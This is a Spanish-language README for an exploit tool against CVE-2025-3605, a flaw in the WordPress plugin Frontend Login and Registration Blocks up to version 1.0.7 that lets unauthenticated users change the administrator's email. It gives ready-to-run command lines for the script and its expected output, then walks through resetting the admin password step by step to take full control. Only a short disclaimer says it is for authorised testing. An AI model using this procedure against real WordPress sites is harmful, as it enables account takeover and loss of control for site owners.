
El plugin WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 es vulnerable a Escalada de Privilegios.
El plugin Frontend Login and Registration Blocks para WordPress (versiones <= 1.0.7) es vulnerable a escalada de privilegios mediante apropiación de cuentas.
El problema surge porque el plugin no valida la identidad del usuario al actualizar datos sensibles como el correo electrónico a través de la función flr_blocks_user_settings_handle_ajax_callback().
✅ Impacto:
Un atacante no autenticado puede cambiar el correo electrónico del administrador, activar el proceso de "Olvidé mi contraseña" y restablecer la contraseña del administrador, obteniendo control total.
El script Python incluido automatiza el proceso de explotación apuntando al endpoint AJAX vulnerable:
/wp-admin/admin-ajax.php
Actualiza el correo electrónico del usuario objetivo (normalmente user_id 1 para el administrador) a un correo controlado por el atacante.
Nombre del archivo: CVE-2025-3605.py
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail [email protected]
✅ Valores por defecto:
--user_id: 1 (administrador por defecto)--mail: [email protected]Para ver el menú de ayuda, ejecute:
python CVE-2025-3605.py --help
Salida:
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]
Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target URL, e.g., http://192.168.100.74:888/wordpress
--user_id, -id USER_ID
User ID to target (default: 1)
--mail, -mail MAIL Email to set (default: [email protected])
✅ Ejemplo de Ejecución:
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail [email protected]
✅ En caso de éxito:
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )
❌ En caso de fallo:
[!] Exploit failed. HTTP Status: 400
[!] Response: 0
1️⃣ Navegue a:
http://target-site/wordpress/wp-login.php
2️⃣ Ingrese el nuevo correo electrónico que configuró ([email protected]).
3️⃣ Solicite un restablecimiento de contraseña.
4️⃣ Establezca una nueva contraseña.
5️⃣ Inicie sesión como administrador y disfrute del acceso completo.
Este exploit y script se proporcionan solo con fines educativos y de pruebas autorizadas.
Cualquier uso no autorizado contra sistemas que no posea o para los que no tenga permiso explícito para probar es ilegal y poco ético.
Por: Khaled Alenazi (Nxploited)